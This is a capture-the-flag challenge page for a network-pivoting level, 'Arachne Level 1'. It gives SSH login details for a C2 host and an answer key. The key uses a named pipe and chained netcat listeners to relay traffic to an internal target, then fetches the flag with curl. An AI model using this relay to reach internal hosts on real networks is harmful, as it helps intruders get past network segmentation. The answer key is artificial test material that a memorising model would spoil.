Arachne Level 1
- User: user11
- Password: RVk2GrqKk45bcX9T
- Pivot SSH Port: 11000
- Pivot IP: DownTheWire.org
- Pivot Ports: 11001-11010
- Target IP: 10.10.100.243
- Target Port:11001
Using the above username, password, Pivot IP, and Port, SSH into Level 1. Once connected to the C2, find and utilize the appropriate application to pivot to the target IP and port. Any ports listed in the Pivot Port range can be used bind a local listener on the C2 server. Once the pivot application is configured and running, use cURL or an equivalent application to access the flag. Be sure to save the flag as it is the password for the next level.
Hint 1
user12:~$ help
cd echo help kill lpath lsudo nc ps
clear exit history ll ls mknod netstat tee
Map

Answer
#On C2
mknod backpipe p
nc -l -p 11002 0<backpipe | nc 10.10.100.243 11001 | tee backpipe
#On Kali
curl -k https://downthewire.org:11002